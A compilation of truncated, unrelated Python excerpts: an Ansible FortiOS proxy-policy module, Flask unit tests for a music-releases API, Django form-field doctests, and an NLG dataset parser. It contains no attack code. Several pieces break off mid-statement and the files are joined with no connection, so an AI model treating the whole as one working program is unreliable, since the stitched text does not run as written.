"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
},
"revisions": {
"v6.0.0": True,
"v7.0.0": True,
"v6.0.5": True,
"v6.4.4": True,
"v7.0.1": True,
"v6.4.0": True,
"v6.4.1": True,
"v6.2.0": True,
"v6.2.3": True,
"v6.2.5": True,
"v6.2.7": True,
"v6.0.11": True
}
}
def main():
module_spec = schema_to_module_spec(versioned_schema)
mkeyname = 'policyid'
fields = {
"access_token": {"required": False, "type": "str", "no_log": True},
"enable_log": {"required": False, "type": bool},
"vdom": {"required": False, "type": "str", "default": "root"},
"member_path": {"required": False, "type": "str"},
"member_state": {
"type": "str",
"required": False,
"choices": ["present", "absent"]
},
"state": {"required": True, "type": "str",
"choices": ["present", "absent"]},
"firewall_proxy_policy": {
"required": False, "type": "dict", "default": None,
"options": {
}
}
}
for attribute_name in module_spec['options']:
fields["firewall_proxy_policy"]['options'][attribute_name] = module_spec['options'][attribute_name]
if mkeyname and mkeyname == attribute_name:
fields["firewall_proxy_policy"]['options'][attribute_name]['required'] = True
check_legacy_fortiosapi()
module = AnsibleModule(argument_spec=fields,
supports_check_mode=True)
versions_check_result = None
if module._socket_path:
connection = Connection(module._socket_path)
if 'access_token' in module.params:
connection.set_option('access_token', module.params['access_token'])
if 'enable_log' in module.params:
connection.set_option('enable_log', module.params['enable_log'])
else:
connection.set_option('enable_log', False)
fos = FortiOSHandler(connection, module, mkeyname)
versions_check_result = check_schema_versioning(fos, versioned_schema, "firewall_proxy_policy")
| |
import json
import unittest
from flask_caching import Cache
from sqlalchemy import asc
from app import app, db
from apps.releases.models import (
Releases,
ReleaseFormats,
ReleasesFormatsMapping,
ReleaseCategories,
ReleasesCategoriesMapping,
ReleasesReports
)
from apps.releases.patches import patch_mapping
from apps.people.models import People, ReleasesPeopleMapping
from apps.songs.models import Songs, ReleasesSongsMapping
from apps.users.models import Users, UsersAccessTokens, UsersAccessMapping, UsersAccessLevels
from apps.utils.time import get_datetime, get_datetime_one_hour_ahead, get_datetime_one_month_ago
class TestReleases(unittest.TestCase):
"""Terms used in the tests.
CFPS:
C = Categories (Full length, Live, Demo, etc)
F = Formats (CD, CD-R, Digital, etc)
P = People (who plays what on the album)
S = Songs (foreign key IDs)
"""
def setUp(self):
# Clear redis cache completely
cache = Cache()
cache.init_app(app, config={"CACHE_TYPE": "RedisCache"})
with app.app_context():
cache.clear()
self.app = app.test_client()
# Add two test releases
release = Releases(
Title="UnitTest",
Date=get_datetime_one_month_ago(),
Artist="UnitTest Arts",
Credits="UnitTest is a good and fun activity",
Created=get_datetime_one_month_ago(),
ReleaseCode="TEST001"
)
release2 = Releases(
Title="UnitTest 2",
Date=get_datetime(),
Artist="UnitTest 2 Arts",
Credits="UnitTest too is good for testing",
Created=get_datetime(),
ReleaseCode="TEST002"
)
db.session.add(release)
db.session.add(release2)
# Flush, so we can use the insert ID below
db.session.flush()
self.release_ids = []
self.release_ids.append(release.ReleaseID)
self.release_ids.append(release2.ReleaseID)
# Add categories and mapping for the releases
cats = ReleaseCategories(
ReleaseCategory="UnitTest Category"
)
cats2 = ReleaseCategories(
ReleaseCategory="UnitTest Category 2"
)
cats3 = ReleaseCategories(
ReleaseCategory="UnitTest Category 3"
)
db.session.add(cats)
db.session.add(cats2)
db.session.add(cats3)
db.session.flush()
self.valid_cats = []
self.valid_cats.append(cats.ReleaseCategoryID)
self.valid_cats.append(cats2.ReleaseCategoryID)
self.valid_cats.append(cats3.ReleaseCategoryID)
cat_map = ReleasesCategoriesMapping(
ReleaseID=release.ReleaseID,
ReleaseCategoryID=cats.ReleaseCategoryID,
)
cat_map2 = ReleasesCategoriesMapping(
ReleaseID=release2.ReleaseID,
ReleaseCategoryID=cats.ReleaseCategoryID,
)
db.session.add(cat_map)
db.session.add(cat_map2)
# Add formats and mapping for the release
format_cd = ReleaseFormats(
Title="CD"
)
format_digital = ReleaseFormats(
Title="Digital"
)
db.session.add(format_cd)
db.session.add(format_digital)
db.session.flush()
# For patch testing
format1 = ReleaseFormats(
Title="UnitTest Format One"
)
format2 = ReleaseFormats(
Title="UnitTest Format Two"
)
db.session.add(format1)
db.session.add(format2)
db.session.flush()
self.valid_formats = []
self.valid_formats.append(format1.ReleaseFormatID)
self.valid_formats.append(format2.ReleaseFormatID)
format_mapping = ReleasesFormatsMapping(
ReleaseFormatID=format_cd.ReleaseFormatID,
ReleaseID=release.ReleaseID,
)
format_mapping2 = ReleasesFormatsMapping(
ReleaseFormatID=format_cd.ReleaseFormatID,
ReleaseID=release2.ReleaseID,
)
db.session.add(format_mapping)
db.session.add(format_mapping2)
# Add people and mapping for the release. For some reason, this sometimes is not deleted
# by tearDown. XXX: Not sure why, so we just check if it exists and use the existing.
person = People.query.filter_by(Name="UnitTester").first()
if not person:
person = People(
Name="UnitTester"
)
db.session.add(person)
db.session.flush()
# For testing patching:
person1 = People(
Name="UnitTest Person One"
)
person2 = People(
Name="UnitTest Person Two"
)
db.session.add(person1)
db.session.add(person2)
db.session.flush()
self.valid_people = []
self.valid_people.append(person1.PersonID)
self.valid_people.append(person2.PersonID)
person_map = ReleasesPeopleMapping(
ReleaseID=release.ReleaseID,
PersonID=person.PersonID,
Instruments="UnitTesting with Guitars",
)
person_map2 = ReleasesPeopleMapping(
ReleaseID=release2.ReleaseID,
PersonID=person.PersonID,
Instruments="UnitTesting with Extra spice",
)
db.session.add(person_map)
db.session.add(person_map2)
# Add songs for the release
song1 = Songs(
Title="UnitTest One",
Duration=66,
)
song2 = Songs(
Title="UnitTest Two",
Duration=120,
)
song3 = Songs(
Title="UnitTest Three",
Duration=123,
)
# And some patch songs
song_p1 = Songs(
Title="UnitTest Patch One",
Duration=59,
)
song_p2 = Songs(
Title="UnitTest Patch Two",
Duration=161,
)
db.session.add(song1)
db.session.add(song2)
db.session.add(song3)
db.session.add(song_p1)
db.session.add(song_p2)
db.session.flush()
self.valid_songs = []
self.valid_songs.append(song_p1.SongID)
self.valid_songs.append(song_p2.SongID)
release_map1 = ReleasesSongsMapping(
ReleaseID=release.ReleaseID,
SongID=song1.SongID,
ReleaseSongDuration=66,
)
release_map2 = ReleasesSongsMapping(
ReleaseID=release.ReleaseID,
SongID=song2.SongID,
ReleaseSongDuration=120,
)
release_map3 = ReleasesSongsMapping(
ReleaseID=release.ReleaseID,
SongID=song3.SongID,
ReleaseSongDuration=123,
)
# It's fine to have the same songs in another release too (could be a live album)
release2_map1 = ReleasesSongsMapping(
ReleaseID=release2.ReleaseID,
SongID=song1.SongID,
ReleaseSongDuration=66,
)
release2_map2 = ReleasesSongsMapping(
ReleaseID=release2.ReleaseID,
SongID=song2.SongID,
ReleaseSongDuration=120,
)
release2_map3 = ReleasesSongsMapping(
ReleaseID=release2.ReleaseID,
SongID=song3.SongID,
ReleaseSongDuration=123,
)
db.session.add(release_map1)
db.session.add(release_map2)
db.session.add(release_map3)
db.session.add(release2_map1)
db.session.add(release2_map2)
db.session.add(release2_map3)
# Phew! Let's commit
db.session.commit()
# We also need a valid admin user for the add release endpoint test.
user = Users(
Name="UnitTest Admin",
Username="unittest",
Password="password"
)
db.session.add(user)
db.session.commit()
# This is non-standard, but is fine for testing.
self.access_token = "unittest-access-token"
user_token = UsersAccessTokens(
UserID=user.UserID,
AccessToken=self.access_token,
ExpirationDate=get_datetime_one_hour_ahead()
)
db.session.add(user_token)
db.session.commit()
# Define level for admin
if not UsersAccessLevels.query.filter_by(LevelName="Admin").first():
access_level = UsersAccessLevels(
UsersAccessLevelID=4,
LevelName="Admin"
)
db.session.add(access_level)
db.session.commit()
grant_admin = UsersAccessMapping(
UserID=user.UserID,
UsersAccessLevelID=4
)
db.session.add(grant_admin)
db.session.commit()
self.user_id = user.UserID
# Add two studio reports for the first release
report1 = ReleasesReports(
ReleaseID=self.release_ids[0],
Report="UnitTest\r\n\r\nReport\r\nData",
Author="UnitTest Author",
ReportDate=get_datetime(),
Created=get_datetime()
)
report2 = ReleasesReports(
ReleaseID=self.release_ids[0],
Report="UnitTest\r\n\r\nReport2\r\nData2",
Author="UnitTest Author",
ReportDate=get_datetime(),
Created=get_datetime()
)
db.session.add(report1)
db.session.add(report2)
db.session.commit()
def tearDown(self):
# This will delete all the mappings too, via ondelete cascade
releases = Releases.query.filter(Releases.Title.like("UnitTest%")).all()
for release in releases:
db.session.delete(release)
db.session.commit()
# But the CFPS need to be deleted separately
cats = ReleaseCategories.query.filter(
ReleaseCategories.ReleaseCategory.like("UnitTest%")).all()
for cat in cats:
db.session.delete(cat)
db.session.commit()
formats = ReleaseFormats.query.all()
for f in formats:
db.session.delete(f)
db.session.commit()
people = People.query.filter(People.Name.like("UnitTest%")).all()
for person in people:
db.session.delete(person)
db.session.commit()
songs = Songs.query.filter(Songs.Title.like("UnitTest%")).all()
for song in songs:
db.session.delete(song)
db.session.commit()
user = Users.query.filter_by(UserID=self.user_id).first()
db.session.delete(user)
db.session.commit()
def test_getting_one_release(self):
"""This should return all the details of a single release, including the CFPS"""
response = self.app.get("/api/1.0/releases/{}".format(self.release_ids[0]))
release = json.loads(
response.get_data().decode()
)
self.assertEqual(200, response.status_code)
self.assertFalse(release is None)
self.assertEqual("UnitTest Arts", release["releases"][0]["artist"])
self.assertEqual("UnitTest is a good and fun activity", release["releases"][0]["credits"])
self.assertEqual(1, len(release["releases"][0]["categories"]))
self.assertEqual(1, len(release["releases"][0]["formats"]))
self.assertEqual(1, len(release["releases"][0]["people"]))
self.assertEqual(3, len(release["releases"][0]["songs"]))
# SongID is used for lyrics and tabs
self.assertTrue("id" in release["releases"][0]["songs"][0])
self.assertTrue(type(int(release["releases"][0]["songs"][0]["id"])) == int)
def test_getting_all_releases(self):
"""Should return all the releases and all their details, including CFPS, in reverse
chronological order (newest release first)"""
response = self.app.get("/api/1.0/releases/")
releases = json.loads(
response.get_data().decode()
)
self.assertEqual(200, response.status_code)
self.assertEqual(2, len(releases["releases"]))
self.assertEqual("UnitTest 2", releases["releases"][0]["title"])
self.assertEqual("UnitTest", releases["releases"][1]["title"])
self.assertEqual(1, len(releases["releases"][0]["categories"]))
self.assertEqual(1, len(releases["releases"][0]["formats"]))
self.assertEqual(1, len(releases["releases"][0]["people"]))
self.assertEqual(3, len(releases["releases"][0]["songs"]))
self.assertEqual(1, len(releases["releases"][1]["categories"]))
self.assertEqual(1, len(releases["releases"][1]["formats"]))
self.assertEqual(1, len(releases["releases"][1]["people"]))
self.assertEqual(3, len(releases["releases"][1]["songs"]))
# SongID is used for lyrics and tabs
self.assertTrue("id" in releases["releases"][0]["songs"][0])
self.assertTrue(type(int(releases["releases"][0]["songs"][0]["id"])) == int)
self.assertTrue("id" in releases["releases"][1]["songs"][0])
self.assertTrue(type(int(releases["releases"][1]["songs"][0]["id"])) == int)
def test_adding_a_release(self):
"""Should insert the release and all it's related data.
NB: This endpoint requires a valid admin token in the request header. We create one in
setUp() for this test."""
response = self.app.post(
"/api/1.0/releases/",
data=json.dumps(
dict(
title="UnitTest Title",
releaseCode="TEST001",
releaseDate=get_datetime(),
artist="UnitTest Artist",
credits="UnitTest Credits",
categories=["UnitTest Category"],
formats=["UnitTest Format"],
people=[{"UnitTest Person": "UnitTest Guitar"}],
songs=[{"UnitTest Song 1": 85}],
)
),
content_type="application/json",
headers={
'User': self.user_id,
'Authorization': self.access_token
}
)
release = Releases.query.filter_by(Title="UnitTest Title").first_or_404()
cats = ReleasesCategoriesMapping.query.filter_by(ReleaseID=release.ReleaseID).order_by(
asc(ReleasesCategoriesMapping.ReleaseCategoryID)).all()
formats = ReleasesFormatsMapping.query.filter_by(ReleaseID=release.ReleaseID).order_by(
asc(ReleasesFormatsMapping.ReleaseFormatID)).all()
people = ReleasesPeopleMapping.query.filter_by(ReleaseID=release.ReleaseID).order_by(
asc(ReleasesPeopleMapping.ReleasesPeopleMappingID)).all()
songs = ReleasesSongsMapping.query.filter_by(ReleaseID=release.ReleaseID).order_by(
asc(ReleasesSongsMapping.ReleasesSongsMappingID)).all()
self.assertEqual(201, response.status_code)
self.assertTrue("Location" in response.get_data().decode())
self.assertEqual("UnitTest Title", release.Title)
# These are tested more thoroughly in their own unit tests, so just a simple check here
self.assertEqual(1, len(cats))
self.assertEqual(
"UnitTest Category",
ReleaseCategories.query.filter_by(
ReleaseCategoryID=cats[0].ReleaseCategoryID
).first().ReleaseCategory
)
self.assertEqual(1, len(formats))
self.assertEqual(
"UnitTest Format",
ReleaseFormats.query.filter_by(
ReleaseFormatID=formats[0].ReleaseFormatID
).first().Title
)
self.assertEqual(1, len(people))
self.assertEqual(
"UnitTest Person",
People.query.filter_by(PersonID=people[0].PersonID).first().Name
)
self.assertEqual(1, len(songs))
self.assertEqual(
"UnitTest Song 1",
Songs.query.filter_by(SongID=songs[0].SongID).first().Title
)
def test_updating_release(self):
"""Using PUT will replace the entire release dataset with the new values defined in the
JSON of the request. All previous values and mapping should be cleared and only the new
ones will remain."""
response = self.app.put(
"/api/1.0/releases/{}".format(int(self.release_ids[0])),
data=json.dumps(
dict(
title="UnitTest Title Put",
releaseCode="TEST001",
releaseDate=get_datetime(),
artist="UnitTest Artist Put",
credits="UnitTest Credits Put",
categories=["UnitTest Category Put"],
formats=["UnitTest Format Put"],
people=[{"UnitTest Person": "UnitTest Guitar Put"}],
songs=[{"UnitTest Song 1": 89}],
)
),
content_type="application/json",
headers={
'User': self.user_id,
'Authorization': self.access_token
}
)
release = Releases.query.get_or_404(self.release_ids[0])
cats = ReleasesCategoriesMapping.query.filter_by(ReleaseID=release.ReleaseID).order_by(
asc(ReleasesCategoriesMapping.ReleaseCategoryID)).all()
formats = ReleasesFormatsMapping.query.filter_by(ReleaseID=release.ReleaseID).order_by(
asc(ReleasesFormatsMapping.ReleaseFormatID)).all()
people = ReleasesPeopleMapping.query.filter_by(ReleaseID=release.ReleaseID).order_by(
asc(ReleasesPeopleMapping.ReleasesPeopleMappingID)).all()
songs = ReleasesSongsMapping.query.filter_by(ReleaseID=release.ReleaseID).order_by(
asc(ReleasesSongsMapping.ReleasesSongsMappingID)).all()
self.assertEqual(200, response.status_code)
self.assertEqual("UnitTest Title Put", release.Title)
self.assertEqual("UnitTest Artist Put", release.Artist)
# Categories
self.assertEqual(1, len(cats))
self.assertEqual(
"UnitTest Category Put",
ReleaseCategories.query.filter_by(
ReleaseCategoryID=cats[0].ReleaseCategoryID
).first().ReleaseCategory
)
# Formats
self.assertEqual(1, len(formats))
self.assertEqual(
"UnitTest Format Put",
ReleaseFormats.query.filter_by(
ReleaseFormatID=formats[0].ReleaseFormatID
).first().Title
)
# People
# NB: Any person created during the initial adding of release will still remain. However,
# the new value in a PUT will be evaluated as usual as either existing, new or invalid.
# The original person will not be deleted by a PUT, but the mapping for this release will
# be cleared and replaced with the new people defined in the JSON.
self.assertEqual(1, len(people))
self.assertEqual(
"UnitTest Guitar Put",
ReleasesPeopleMapping.query.filter_by(
ReleasesPeopleMappingID=people[0].ReleasesPeopleMappingID
).first().Instruments
)
# Songs
# NB: One limitation is that if a Song was first inserted during adding a release and
# the original had a wrong song duration, then you can only update it for the release
# mapping. The original song will still have the wrong duration, and we shouldn't update it
# every time a release is updated, because the time should be release-specific.
# So the only choice is to use the PUT /songs/:id or PATCH /songs/:id endpoint to update
# the original song. Or just fix it manually in the DB :)
self.assertEqual(1, len(songs))
self.assertEqual(
89,
ReleasesSongsMapping.query.filter_by(
ReleasesSongsMappingID=songs[0].ReleasesSongsMappingID
).first().ReleaseSongDuration
)
def test_patch_mapping(self):
"""Because the JSON values can be in different case than the actual DB model, we map them
| |
# -*- coding: utf-8 -*-
tests = r"""
>>> from django.forms import *
>>> from django.forms.widgets import RadioFieldRenderer
>>> from django.core.files.uploadedfile import SimpleUploadedFile
>>> import datetime
>>> import time
>>> import re
>>> try:
... from decimal import Decimal
... except ImportError:
... from django.utils._decimal import Decimal
##########
# Fields #
##########
Each Field class does some sort of validation. Each Field has a clean() method,
which either raises django.forms.ValidationError or returns the "clean"
data -- usually a Unicode object, but, in some rare cases, a list.
Each Field's __init__() takes at least these parameters:
required -- Boolean that specifies whether the field is required.
True by default.
widget -- A Widget class, or instance of a Widget class, that should be
used for this Field when displaying it. Each Field has a default
Widget that it'll use if you don't specify this. In most cases,
the default widget is TextInput.
label -- A verbose name for this field, for use in displaying this field in
a form. By default, Django will use a "pretty" version of the form
field name, if the Field is part of a Form.
initial -- A value to use in this Field's initial display. This value is
*not* used as a fallback if data isn't given.
Other than that, the Field subclasses have class-specific options for
__init__(). For example, CharField has a max_length option.
# CharField ###################################################################
>>> f = CharField()
>>> f.clean(1)
u'1'
>>> f.clean('hello')
u'hello'
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean([1, 2, 3])
u'[1, 2, 3]'
>>> f = CharField(required=False)
>>> f.clean(1)
u'1'
>>> f.clean('hello')
u'hello'
>>> f.clean(None)
u''
>>> f.clean('')
u''
>>> f.clean([1, 2, 3])
u'[1, 2, 3]'
CharField accepts an optional max_length parameter:
>>> f = CharField(max_length=10, required=False)
>>> f.clean('12345')
u'12345'
>>> f.clean('1234567890')
u'1234567890'
>>> f.clean('1234567890a')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at most 10 characters (it has 11).']
CharField accepts an optional min_length parameter:
>>> f = CharField(min_length=10, required=False)
>>> f.clean('')
u''
>>> f.clean('12345')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at least 10 characters (it has 5).']
>>> f.clean('1234567890')
u'1234567890'
>>> f.clean('1234567890a')
u'1234567890a'
>>> f = CharField(min_length=10, required=True)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('12345')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at least 10 characters (it has 5).']
>>> f.clean('1234567890')
u'1234567890'
>>> f.clean('1234567890a')
u'1234567890a'
# IntegerField ################################################################
>>> f = IntegerField()
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('1')
1
>>> isinstance(f.clean('1'), int)
True
>>> f.clean('23')
23
>>> f.clean('a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a whole number.']
>>> f.clean(42)
42
>>> f.clean(3.14)
Traceback (most recent call last):
...
ValidationError: [u'Enter a whole number.']
>>> f.clean('1 ')
1
>>> f.clean(' 1')
1
>>> f.clean(' 1 ')
1
>>> f.clean('1a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a whole number.']
>>> f = IntegerField(required=False)
>>> f.clean('')
>>> repr(f.clean(''))
'None'
>>> f.clean(None)
>>> repr(f.clean(None))
'None'
>>> f.clean('1')
1
>>> isinstance(f.clean('1'), int)
True
>>> f.clean('23')
23
>>> f.clean('a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a whole number.']
>>> f.clean('1 ')
1
>>> f.clean(' 1')
1
>>> f.clean(' 1 ')
1
>>> f.clean('1a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a whole number.']
IntegerField accepts an optional max_value parameter:
>>> f = IntegerField(max_value=10)
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(1)
1
>>> f.clean(10)
10
>>> f.clean(11)
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is less than or equal to 10.']
>>> f.clean('10')
10
>>> f.clean('11')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is less than or equal to 10.']
IntegerField accepts an optional min_value parameter:
>>> f = IntegerField(min_value=10)
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(1)
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is greater than or equal to 10.']
>>> f.clean(10)
10
>>> f.clean(11)
11
>>> f.clean('10')
10
>>> f.clean('11')
11
min_value and max_value can be used together:
>>> f = IntegerField(min_value=10, max_value=20)
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(1)
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is greater than or equal to 10.']
>>> f.clean(10)
10
>>> f.clean(11)
11
>>> f.clean('10')
10
>>> f.clean('11')
11
>>> f.clean(20)
20
>>> f.clean(21)
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is less than or equal to 20.']
# FloatField ##################################################################
>>> f = FloatField()
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('1')
1.0
>>> isinstance(f.clean('1'), float)
True
>>> f.clean('23')
23.0
>>> f.clean('3.14')
3.1400000000000001
>>> f.clean(3.14)
3.1400000000000001
>>> f.clean(42)
42.0
>>> f.clean('a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f.clean('1.0 ')
1.0
>>> f.clean(' 1.0')
1.0
>>> f.clean(' 1.0 ')
1.0
>>> f.clean('1.0a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f = FloatField(required=False)
>>> f.clean('')
>>> f.clean(None)
>>> f.clean('1')
1.0
FloatField accepts min_value and max_value just like IntegerField:
>>> f = FloatField(max_value=1.5, min_value=0.5)
>>> f.clean('1.6')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is less than or equal to 1.5.']
>>> f.clean('0.4')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is greater than or equal to 0.5.']
>>> f.clean('1.5')
1.5
>>> f.clean('0.5')
0.5
# DecimalField ################################################################
>>> f = DecimalField(max_digits=4, decimal_places=2)
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('1') == Decimal("1")
True
>>> isinstance(f.clean('1'), Decimal)
True
>>> f.clean('23') == Decimal("23")
True
>>> f.clean('3.14') == Decimal("3.14")
True
>>> f.clean(3.14) == Decimal("3.14")
True
>>> f.clean(Decimal('3.14')) == Decimal("3.14")
True
>>> f.clean('NaN')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f.clean('Inf')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f.clean('-Inf')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f.clean('a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f.clean(u'łąść')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f.clean('1.0 ') == Decimal("1.0")
True
>>> f.clean(' 1.0') == Decimal("1.0")
True
>>> f.clean(' 1.0 ') == Decimal("1.0")
True
>>> f.clean('1.0a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f.clean('123.45')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 4 digits in total.']
>>> f.clean('1.234')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 2 decimal places.']
>>> f.clean('123.4')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 2 digits before the decimal point.']
>>> f.clean('-12.34') == Decimal("-12.34")
True
>>> f.clean('-123.45')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 4 digits in total.']
>>> f.clean('-.12') == Decimal("-0.12")
True
>>> f.clean('-00.12') == Decimal("-0.12")
True
>>> f.clean('-000.12') == Decimal("-0.12")
True
>>> f.clean('-000.123')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 2 decimal places.']
>>> f.clean('-000.12345')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 4 digits in total.']
>>> f.clean('--0.12')
Traceback (most recent call last):
...
ValidationError: [u'Enter a number.']
>>> f = DecimalField(max_digits=4, decimal_places=2, required=False)
>>> f.clean('')
>>> f.clean(None)
>>> f.clean('1') == Decimal("1")
True
DecimalField accepts min_value and max_value just like IntegerField:
>>> f = DecimalField(max_digits=4, decimal_places=2, max_value=Decimal('1.5'), min_value=Decimal('0.5'))
>>> f.clean('1.6')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is less than or equal to 1.5.']
>>> f.clean('0.4')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value is greater than or equal to 0.5.']
>>> f.clean('1.5') == Decimal("1.5")
True
>>> f.clean('0.5') == Decimal("0.5")
True
>>> f.clean('.5') == Decimal("0.5")
True
>>> f.clean('00.50') == Decimal("0.50")
True
>>> f = DecimalField(decimal_places=2)
>>> f.clean('0.00000001')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 2 decimal places.']
>>> f = DecimalField(max_digits=3)
# Leading whole zeros "collapse" to one digit.
>>> f.clean('0000000.10') == Decimal("0.1")
True
# But a leading 0 before the . doesn't count towards max_digits
>>> f.clean('0000000.100') == Decimal("0.100")
True
# Only leading whole zeros "collapse" to one digit.
>>> f.clean('000000.02') == Decimal('0.02')
True
>>> f.clean('000000.0002')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 3 digits in total.']
>>> f.clean('.002') == Decimal("0.002")
True
>>> f = DecimalField(max_digits=2, decimal_places=2)
>>> f.clean('.01') == Decimal(".01")
True
>>> f.clean('1.1')
Traceback (most recent call last):
...
ValidationError: [u'Ensure that there are no more than 0 digits before the decimal point.']
# DateField ###################################################################
>>> import datetime
>>> f = DateField()
>>> f.clean(datetime.date(2006, 10, 25))
datetime.date(2006, 10, 25)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30))
datetime.date(2006, 10, 25)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59))
datetime.date(2006, 10, 25)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200))
datetime.date(2006, 10, 25)
>>> f.clean('2006-10-25')
datetime.date(2006, 10, 25)
>>> f.clean('10/25/2006')
datetime.date(2006, 10, 25)
>>> f.clean('10/25/06')
datetime.date(2006, 10, 25)
>>> f.clean('Oct 25 2006')
datetime.date(2006, 10, 25)
>>> f.clean('October 25 2006')
datetime.date(2006, 10, 25)
>>> f.clean('October 25, 2006')
datetime.date(2006, 10, 25)
>>> f.clean('25 October 2006')
datetime.date(2006, 10, 25)
>>> f.clean('25 October, 2006')
datetime.date(2006, 10, 25)
>>> f.clean('2006-4-31')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f.clean('200a-10-25')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f.clean('25/10/06')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f = DateField(required=False)
>>> f.clean(None)
>>> repr(f.clean(None))
'None'
>>> f.clean('')
>>> repr(f.clean(''))
'None'
DateField accepts an optional input_formats parameter:
>>> f = DateField(input_formats=['%Y %m %d'])
>>> f.clean(datetime.date(2006, 10, 25))
datetime.date(2006, 10, 25)
>>> f.clean(datetime.datetime(2006, 10, 25, 14, 30))
datetime.date(2006, 10, 25)
>>> f.clean('2006 10 25')
datetime.date(2006, 10, 25)
The input_formats parameter overrides all default input formats,
so the default formats won't work unless you specify them:
>>> f.clean('2006-10-25')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f.clean('10/25/2006')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f.clean('10/25/06')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
# TimeField ###################################################################
>>> import datetime
>>> f = TimeField()
>>> f.clean(datetime.time(14, 25))
datetime.time(14, 25)
>>> f.clean(datetime.time(14, 25, 59))
datetime.time(14, 25, 59)
>>> f.clean('14:25')
datetime.time(14, 25)
>>> f.clean('14:25:59')
datetime.time(14, 25, 59)
>>> f.clean('hello')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid time.']
>>> f.clean('1:24 p.m.')
Traceback (most recent call last):
...
ValidationError: [u'Enter | |
# <NAME>, 2017:
from structuredPredictionNLG.Action import Action
from structuredPredictionNLG.MeaningRepresentation import MeaningRepresentation
from structuredPredictionNLG.DatasetInstance import DatasetInstance, cleanAndGetAttr, lexicalize_word_sequence
from structuredPredictionNLG.FullDelexicalizator import full_delexicalize_E2E
from structuredPredictionNLG.SimpleContentPredictor import SimpleContentPredictor
from collections import Counter
import os.path
import re
import Levenshtein
import _pickle as pickle
import json
import xml.etree.ElementTree as ET
import string
from dateutil import parser as dateparser
from nltk.util import ngrams
'''
This is a general specification of a DatasetParser.
A descendant of this class will need to be creater for every specific dataset
(to deal with dataset-specific formats)
'''
class DatasetParser:
def __init__(self, trainingFile, developmentFile, testingFile, dataset, opt, light=False):
# self.base_dir = '../'
self.base_dir = ''
self.dataset = dataset
self.dataset_name = opt.name
self.trainingInstances = {}
self.developmentInstances = {}
self.testingInstances = {}
self.trainingInstances = False
self.developmentInstances = False
self.testingInstances = False
self.train_src_to_di = {}
self.dev_src_to_di = {}
self.test_src_to_di = {}
self.available_values = set()
self.available_subjects = set()
self.availableContentActions = {}
self.availableWordActions = {}
self.availableWordCounts = {}
self.trim = opt.trim
self.ngram_lists_per_word_sequence = {}
self.ngram_lists_per_relexed_word_sequence = {}
self.total_relexed_ngram_lists = set()
self.check_cache_path()
if (opt.reset or not self.loadTrainingLists(opt.trim, opt.full_delex, opt.infer_MRs, light)) and trainingFile:
self.predicates = []
self.attributes = {}
self.valueAlignments = {}
self.vocabulary = set()
